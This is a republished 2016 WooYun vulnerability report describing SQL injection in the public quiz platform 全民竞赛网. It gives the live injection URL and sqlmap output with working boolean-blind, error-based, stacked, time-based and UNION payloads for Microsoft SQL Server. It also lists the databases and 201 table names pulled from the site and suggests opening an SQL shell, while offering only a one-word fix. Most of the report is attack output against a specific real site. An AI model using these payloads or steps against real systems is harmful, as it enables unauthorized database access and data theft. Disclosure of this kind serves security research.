全民竞赛网sql注入

admin
admin
admin
139297
文章
114
评论
2017年4月25日16:07:38评论335 views字数 202阅读0分40秒阅读模式
摘要

2016-04-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-26: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(1) 关注此漏洞

缺陷编号: WooYun-2016-194810

漏洞标题: 全民竞赛网sql注入

相关厂商: 全民竞赛网

漏洞作者: 路人甲

提交时间: 2016-04-11 10:29

公开时间: 2016-05-26 10:30

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 10

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 注射

1人收藏

漏洞详情

披露状态:

2016-04-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

全民竞赛网是为政府、企事业单位、学校向公众提供宣传和普及知识的网上竞赛平台。

详细说明:

1.全民竞赛网存在sql注入,注入点:http://www.chinese-js.com/NewsDetail.aspx?id=105192

2.sqlmap验证:

code 区域 
sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: id (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: id=105192 AND 3822=3822
 
     Type: error-based
     Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
     Payload: id=105192 AND 2609=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2609=2609) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(106)+CHAR(113)))
 
     Type: inline query
     Title: Microsoft SQL Server/Sybase inline queries
     Payload: id=(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3735=3735) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(106)+CHAR(113))
 
     Type: stacked queries
     Title: Microsoft SQL Server/Sybase stacked queries (comment)
     Payload: id=105192;WAITFOR DELAY '0:0:5'--
 
     Type: AND/OR time-based blind
     Title: Microsoft SQL Server/Sybase time-based blind
     Payload: id=105192 WAITFOR DELAY '0:0:5'
 
     Type: UNION query
     Title: Generic UNION query (NULL) - 18 columns
     Payload: id=105192 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(118)+CHAR(113)+CHAR(109)+CHAR(106)+CHAR(72)+CHAR(121)+CHAR(121)+CHAR(104)+CHAR(89)+CHAR(68)+CHAR(97)+CHAR(108)+CHAR(77)+CHAR(111)+CHAR(71)+CHAR(109)+CHAR(121)+CHAR(70)+CHAR(80)+CHAR(77)+CHAR(115)+CHAR(102)+CHAR(100)+CHAR(116)+CHAR(75)+CHAR(119)+CHAR(72)+CHAR(67)+CHAR(109)+CHAR(122)+CHAR(99)+CHAR(116)+CHAR(117)+CHAR(102)+CHAR(117)+CHAR(102)+CHAR(106)+CHAR(84)+CHAR(122)+CHAR(104)+CHAR(108)+CHAR(109)+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
 ---
 [21:53:50] [INFO] the back-end DBMS is Microsoft SQL Server
 web server operating system: Windows 2003 or XP
 web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
 back-end DBMS: Microsoft SQL Server 2005

3.跑出8个数据库

全民竞赛网sql注入

4.当前数据库为:123js,跑出201个表

code 区域 
Database: 123js                                                                
 [201 tables]
 +-------------------------------------+
 | City                                |
 | CloudService                        |
 | Competition_temp                    |
 | LinkCN1                             |
 | LinkCN1                             |
 | Picture                             |
 | Province                            |
 | View_BranchScore                    |
 | View_Competition_Users              |
 | View_Question                       |
 | View_tblAdUser                      |
 | View_tblAddMoneyRecord              |
 | View_tblArticle                     |
 | View_tblCompPrice                   |
 | View_tblCompPrjEvaluation           |
 | View_tblCompPrjUserComment          |
 | View_tblCompProject                 |
 | View_tblCompType2                   |
 | View_tblCompType3                   |
 | View_tblCreateCompRecord            |
 | View_tblDS_Branch                   |
 | View_tblDS_Competition              |
 | View_tblDS_TestStock                |
 | View_tblDS_UserExamResult           |
 | View_tblDS_Users                    |
 | View_tblDataDownload                |
 | View_tblMember                      |
 | View_tblOrder                       |
 | View_tblResearchRecord              |
 | View_tblSetMealOrder                |
 | View_tblShareExperience             |
 | View_tblSuccessfulCase_New          |
 | View_tblSuccessfulCase_New          |
 | View_tblSysUser                     |
 | View_tblWeinxin_Huodong             |
 | View_tblWeinxin_PrizeUser           |
 | View_tblWeixin_DatiDetail           |
 | View_tblWeixin_Users                |
 | View_tblWenda                       |
 | ceshi                               |
 | comd_list                           |
 | t_jiaozhu                           |
 | tata                                |
 | tblAboutUs                          |
 | tblAdUser                           |
 | tblAddMoneyRecord                   |
 | tblArea                             |
 | tblArticle1                         |
 | tblArticle1                         |
 | tblArticleHistory                   |
 | tblArticleRemark                    |
 | tblArticleRemarkReport              |
 | tblArticleType                      |
 | tblAskForAgent                      |
 | tblBlackList_IP                     |
 | tblBlackList_OpenId                 |
 | tblBranchCode                       |
 | tblCarbonFootprint                  |
 | tblCardNo                           |
 | tblCityIP                           |
 | tblCommendAreaInfo                  |
 | tblCommendAreaInfo                  |
 | tblCommendNews                      |
 | tblCompMode                         |
 | tblCompPrice                        |
 | tblCompPrjEvaluation                |
 | tblCompPrjUserComment               |
 | tblCompProject                      |
 | tblCompSetMeal                      |
 | tblCompType1                        |
 | tblCompType1                        |
 | tblCompType2                        |
 | tblCompType3                        |
 | tblCompUserGroup                    |
 | tblCounty                           |
 | tblCreateCompRecord                 |
 | tblDP_CommentProd                   |
 | tblDP_Company                       |
 | tblDP_ProdType1                     |
 | tblDP_ProdType2                     |
 | tblDP_ProductInfo                   |
 | tblDS_Advice                        |
 | tblDS_Age                           |
 | tblDS_Area                          |
 | tblDS_Baoming                       |
 | tblDS_Branch                        |
 | tblDS_CommendBBS                    |
 | tblDS_CommendInfo                   |
 | tblDS_CompSolution                  |
 | tblDS_CompetitionAd_Temp            |
 | tblDS_CompetitionAd_Temp            |
 | tblDS_CompetitionAd_Temp            |
 | tblDS_CompetitionPoint              |
 | tblDS_CompetitionQuestion           |
 | tblDS_CompetitionType               |
 | tblDS_Identity                      |
 | tblDS_Industry                      |
 | tblDS_JiYu                          |
 | tblDS_Log                           |
 | tblDS_Neighborhood                  |
 | tblDS_Pic                           |
 | tblDS_PrizeBill_Branch              |
 | tblDS_PrizeBill_Person              |
 | tblDS_Street                        |
 | tblDS_TestStockDesc                 |
 | tblDS_TestStockModel                |
 | tblDS_TestStock_temp                |
 | tblDS_TestStock_temp                |
 | tblDS_UserExamResult_Temp           |
 | tblDS_UserExamResult_Temp           |
 | tblDS_Users_Temp                    |
 | tblDS_Users_sj_full1                |
 | tblDS_Users_sj_full1                |
 | tblDS_Work                          |
 | tblDataDownload                     |
 | tblDataDownloadType                 |
 | tblDirect                           |
 | tblFPN_Mutuality                    |
 | tblFriendLink                       |
 | tblFrontPageNews                    |
 | tblFrontPageNewsType                |
 | tblGetNewsLOG                       |
 | tblGrade                            |
 | tblHomeCommend1                     |
 | tblHomeCommend1                     |
 | tblHotNews                          |
 | tblKeyWords                         |
 | tblLeaveWord                        |
 | tblLoginLog                         |
 | tblMember_temp                      |
 | tblMember_temp                      |
 | tblMobile_TestStockScore1           |
 | tblMode                             |
 | tblNewsSource1                      |
 | tblNewsSource1                      |
 | tblObjective                        |
 | tblOrder                            |
 | tblPhotoVoteActiveLeaveWord         |
 | tblPhotoVoteActiveLeaveWord         |
 | tblPhotoVoteDetail                  |
 | tblPhotoVoteInfo                    |
 | tblPhotoVote_PrizeItem              |
 | tblPhotoVote_PrizeUser              |
 | tblPicNews                          |
 | tblPicNewsType                      |
 | tblProductInfo                      |
 | tblResearchDetail                   |
 | tblResearchDetail                   |
 | tblResearchRecord                   |
 | tblRight                            |
 | tblRole                             |
 | tblRoleRight                        |
 | tblSetMealOrder                     |
 | tblShareExperience                  |
 | tblSite                             |
 | tblSpecial_Xihui                    |
 | tblSpiderSource                     |
 | tblSuccessfulCaseType               |
 | tblSuccessfulCase_New               |
 | tblSuccessfulCase_New               |
 | tblSunVoteComp                      |
 | tblSunVoteComp                      |
 | tblSunVoteTestStock                 |
 | tblSunVoteUserExamResult            |
 | tblSunVoteUsers                     |
 | tblSysUser                          |
 | tblTempComp                         |
 | tblTestRandom                       |
 | tblTestRandomType_8                 |
 | tblTestRandomType_8                 |
 | tblUnionids                         |
 | tblUserWorks                        |
 | tblUsers                            |
 | tblVisitRecord_cut                  |
 | tblVisitRecord_cut                  |
 | tblVoteActive                       |
 | tblVoteDetail                       |
 | tblVoteInfo                         |
 | tblVoteItem不用                         |
 | tblVote不用                             |
 | tblWeinxin_HuodongMode              |
 | tblWeinxin_HuodongMode              |
 | tblWeinxin_HuodongPlan              |
 | tblWeinxin_PrizeItem                |
 | tblWeinxin_PrizeUser                |
 | tblWeinxin_RedPacketTotalDetailPlan |
 | tblWeinxin_RedPacketTotalDetailPlan |
 | tblWeinxin_RedPacketUser            |
 | tblWeixin_DatiDetail                |
 | tblWeixin_DatiDetail                |
 | tblWeixin_Shiti                     |
 | tblWeixin_Users                     |
 | tblWenda                            |
 | tblWendaType                        |
 | tblWhiteList_IP                     |
 | tblWhiteList_OpenId                 |
 | tblWorksMessageBoard                |
 | tblWorksNotice                      |
 | tet                                 |
 | xx                                  |
 | 查询                                  |
 +-------------------------------------+

4.可用--sql-shell 写入sql shell进行数据库操作

全民竞赛网sql注入

漏洞证明:

如上。

修复方案:

防注入

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin